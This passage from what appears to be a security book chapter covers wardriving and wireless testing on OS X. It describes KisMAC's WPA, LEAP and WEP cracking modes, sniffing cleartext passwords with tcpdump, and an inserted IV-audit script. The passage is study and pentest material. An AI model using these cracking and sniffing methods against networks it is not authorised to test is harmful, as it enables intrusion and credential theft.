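    print("WPA-PSK:", crack_psk(captured, WORDLIST))
```

Two things follow directly from the code. Nothing in it touches the access point after the capture, which is why the attack can be finished back at the office; and PBKDF2 with 4096 iterations is the whole cost of a guess, so the size of the wordlist, not the strength of the cipher, decides whether the attack finishes. A passphrase that is not in the list is never found, whatever its length.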

Other Attacks

KisMAC also offers the ability to perform attacks against other forms of encryption and authentication. Because these other methods have known vulnerabilities and are rarely used, they are not discussed in detail, but are included for completeness.

Bruteforce Attacks Against 40-bit WEP

KisMAC includes functionality to perform bruteforce attacks against 40-bit WEP keys. There are four ways KisMAC can accomplish this:

■ All possible characters

■ Alphanumeric characters only

■ Lowercase letters only

■ Newsham's 21-bit attack

Newsham's attack exploits the passphrase-to-key generator many vendors used for 40-bit WEP, which only produces 2^21 distinct keys, so it finishes quickly; the character-set bruteforces search a far larger keyspace and are very time- and processor-intensive.

Wordlist Attacks

KisMAC provides the functionality to perform many types of wordlist attacks in addition to WPA attacks. Cisco developed the Lightweight Extensible Authentication Protocol (LEAP) to help organizations concerned about vulnerabilities in WEP. Unfortunately, LEAP is also vulnerable to wordlist attacks similar to WPA, because its MS-CHAPv2 exchange lets an eavesdropper test password guesses offline. KisMAC includes the functionality to perform wordlist attacks against LEAP by following the same procedure used when cracking WPA. Select the against LEAP Key button to begin the attack.

Additionally, wordlist attacks can be launched against 40- and 104-bit Apple keys or 104-bit Message Digest 5 (MD5) keys in the same manner. As with any dictionary attack, these attacks are only effective if a comprehensive dictionary file is used when performing the attack (see www.securitytribe.com/~roamer/words.txt).

Other OS X Tools for WarDriving and WLAN Testing

KisMAC has been the focus of the bulk of this chapter; however, there are several other wireless tools that can keep an OS X hacker busy for hours.

EtherPEG (www.etherpeg.org) is a program that captures and displays all of the Joint Photographic Experts Group (JPEG) and Graphic Interchange Format (GIF) images that are being transferred across the network (including WLANs). In order to use EtherPEG against a wireless network, the network must be unencrypted, or you must be connected to it so that your card sees the decrypted traffic.

iStumbler (http://istumbler.net/), as shown in Figure 6.27, is an active WLAN discovery tool for OS X that works with the built-in Airport Extreme card. In addition to WLAN discovery, iStumbler can also detect Bluetooth devices using the built-in Bluetooth adapter. There is no setup required with iStumbler; simply unpack the archive and click the iStumbler icon to begin.

Figure 6.27 iStumbler

With the release of OS X Tiger, several dashboard widgets have been developed and released that perform active scanning with the Airport and Airport Extreme cards (e.g., Air Traffic Control) (see Figure 6.28).


Figure 6.28 Air Traffic Control

Dashboard widgets are updated regularly and new ones are released nearly every day. Check out the latest wireless discovery widgets at www.apple.com/downloads/dashboard and select the “Networking and Security” option from the “Widget Navigation” menu.

Tcpdump is a network traffic analyzer (sniffer) that ships with OS X. Tcpdump can be configured to listen on a wireless interface to capture traffic coming across the WLAN with the following command:

crapple:~ roamer$ sudo tcpdump -i en1

Tcpdump can be used to capture usernames and passwords that are sent in cleartext (e-mail, Network Basic Input/Output System [NetBIOS], and so forth).

And finally, another useful packet sniffer is Ethereal (www.ethereal.org). Information on installing and using Ethereal is presented in Chapter X.


Summary

When people think of WarDriving and attacking wireless networks, Linux is usually the first OS that comes to mind. While there are fantastic tools available for Linux, there are also several outstanding tools for the wireless hacker available for OS X.

KisMAC is the most popular WarDriving application for OS X. Because it offers the option of both active and passive scanning and a large number of supported chipsets, it is perfect for WarDriving. Add to that the ease of setup and configuration and KisMAC stands out as one of, if not the top, WarDriving application available.

In addition to its power as a WarDriving application, KisMAC is also a very powerful tool for WLAN penetration testing. It provides many of the most popular attacks (the new chopping attacks against WEP being the only omission) and offers penetration testers easy, point-and-click options for some attacks that are traditionally more difficult on other OSes (e.g., deauthentication and traffic reinjection). The tools available for these types of attacks on other OSes are either difficult to use or are so restricted that working with KisMAC’s point-and-click attack method is a welcome change.

While KisMAC is outstanding, it isn’t the only WLAN discovery tool available for OS X. iStumbler has a far smaller feature set than KisMAC, but is extremely easy to use and also includes Bluetooth functionality. There are also several dashboard widgets that can be downloaded from the Apple Web site that work in conjunction with the Airport and Airport Express cards to perform active WLAN discovery.

Wireless hackers are going to be hard pressed to find an OS other than OS X that combines power, functionality, and ease of use with a more robust set of available free tools.

Solutions Fast Track

WarDriving with KisMAC

■ KisMAC is one of the most versatile tools available for WarDriving.

■ KisMAC can operate in both active and passive modes.

■ KisMAC has built-in capability to allow WarDrivers to map their drives.


Penetration Testing with OS X

■ KisMAC provides the capability to perform many wireless penetration testing tasks.

■ KisMAC has the ability to deauthenticate clients built in.

■ KisMAC contains routines for injecting traffic into a wireless network.

■ KisMAC has built-in tools to crack WEP.

■ KisMAC has built-in tools to crack WPA passphrases.

Other OS X Tools for WarDriving and WLAN Testing

■ iStumbler is a tool that can detect not only 802.11 b/g wireless networks, but also Bluetooth devices.

■ As of OS X 10.4 Tiger, there are many dashboard widgets available that can detect wireless networks.

■ A packet analyzer, or sniffer, such as TCPDump or Ethereal is a valuable tool for a wireless penetration tester.


Frequently Asked Questions

The following Frequently Asked Questions, answered by the authors of this book, are designed to both measure your understanding of the concepts presented in this chapter and to assist you with real-life implementation of these concepts. To have your questions about this chapter answered by the author, browse to www.syngress.com/solutions and click on the “Ask the Author” form.

Q. Why do some attacks require weak IVs and some only require unique IVs?

A. The traditional attacks against WEP were originally detailed by Scott Fluhrer, Itsik Mantin, and Adi Shamir in their paper, “Weaknesses in the Key Scheduling Algorithm of RC4” (www.drizzle.com/~aboba/IEEE/rc4_ksaproc.pdf). These attacks are known as FMS attacks. This paper details that a small subset of the total IVs were weak and, if enough were collected, could be used to determine the WEP key. The problem with this method was that it was very time consuming due to the number of packets required to capture enough weak IVs to crack the key.

In February 2002, H1kari detailed a new method for attacking WEP (www.dachb0den.com/projects/bsd-airtools/wepexp.txt), dubbed “chopping,” where weak IVs were no longer required. Instead, approximately 500,000 unique IVs needed to be gathered in order to successfully crack the WEP key. This, coupled with the ability to reinject ARP packets into the network, greatly reduced the amount of time required to crack WEP. Using the FMS method of WEP cracking, it could take weeks or months to successfully crack the WEP key. The chopping method has reduced this to a matter of hours (and sometimes less). This attack took a theoretical threat and turned it into a significant vulnerability for wireless networks utilizing WEP.

More information on WEP cracking and the tools available for cracking can be found in Chris Hurley’s paper, “Aircrack and WEPlab: Should You Believe the Hype,” available for download at www.securityhorizon.com/journal/fall2004.pdf.
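The two IV conditions in the answer above, seen from the monitoring side, as an added example that is not from the book or from KisMAC: a filter for the classic FMS “resolved” IV shape (A + 3, 0xFF, x) that weak-IV-avoiding drivers suppress, and a plain unique/reuse count over the 24-bit IV space that WEP fixes and no filter can enlarge. The sample IVs are constructed, not captured.

```python
"""Weak-IV filter and IV-reuse audit for WEP frames (added example, not from the book)."""
import math
from collections import Counter

# WEP prepends a 24-bit IV to each frame, so there are only 2**24 possible IVs.
IV_BITS = 24
IV_SPACE = 1 << IV_BITS


def is_fms_weak_iv(iv: bytes, key_len: int) -> bool:
    """Classic FMS 'resolved' IV shape (A + 3, 0xFF, x), where A indexes a
    secret key byte. key_len is the secret key length in bytes: 5 for a
    40-bit key, 13 for a 104-bit key. Drivers with weak-IV avoidance skip
    exactly these IVs when transmitting."""
    if len(iv) != 3:
        raise ValueError("a WEP IV is exactly 3 bytes")
    return iv[1] == 0xFF and 3 <= iv[0] < 3 + key_len


def frames_until_expected_repeat(space: int = IV_SPACE) -> float:
    """Birthday bound: about sqrt(pi * N / 2) random IVs before one repeats.
    Weak-IV avoidance does not change this; the IV space is fixed by WEP."""
    return math.sqrt(math.pi * space / 2)


def audit_ivs(ivs, key_len: int = 13) -> dict:
    """Summarise a captured IV stream the way a monitor would: how many frames
    carry FMS-weak IVs (what the original attacks needed) versus how many
    distinct IVs were seen (what the chopping attack counts), plus reuse."""
    counts = Counter(ivs)
    return {
        "frames": len(ivs),
        "unique": len(counts),
        "weak": sum(1 for iv in ivs if is_fms_weak_iv(iv, key_len)),
        "reused": sum(1 for n in counts.values() if n > 1),
    }


# Constructed sample IVs (not a real capture); the third entry is weak only
# for a 104-bit key, and the first entry appears twice.
SAMPLE_IVS = [
    b"\x03\xff\x21", b"\x7a\x10\x02", b"\x08\xff\x00",
    b"\x03\xfe\x00", b"\x03\xff\x21", b"\x10\xff\x00",
]

if __name__ == "__main__":
    print(audit_ivs(SAMPLE_IVS, key_len=13))
    print(audit_ivs(SAMPLE_IVS, key_len=5))
    print(f"expected first IV repeat after ~{frames_until_expected_repeat():.0f} frames")
```

The same IV stream yields a different weak count for a 40-bit and a 104-bit key, while the unique count, the quantity the chopping attack depends on, does not change.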

Q. I remember a tool called MacStumbler. Why isn’t it mentioned in this chapter?

A. MacStumbler (www.macstumbler.com) was one of the first WLAN discovery tools available for OS X. Unfortunately, it only operated in active mode, and development and maintenance ceased in July 2003. Many tools, such as KisMAC, have taken WLAN discovery for OS X to the next level and essentially rendered MacStumbler obsolete. However, it is still available for download and is compatible with both Airport Express cards and OS X Tiger.

Q. Can KisMAC logs be imported into other applications?

A. Yes. You can export KisMAC data to NetStumbler- and MacStumbler-readable formats.

Q. Why would I want to export to NetStumbler format?

A. There are a couple of good reasons to export to NetStumbler format. First, it allows you to map your drives after completion using the assorted mapping tools available. Second, NetStumbler has excellent support for exporting WarDrive data to different formats. Once you have imported your KisMAC data into NetStumbler, you have the ability to export to any of these formats.
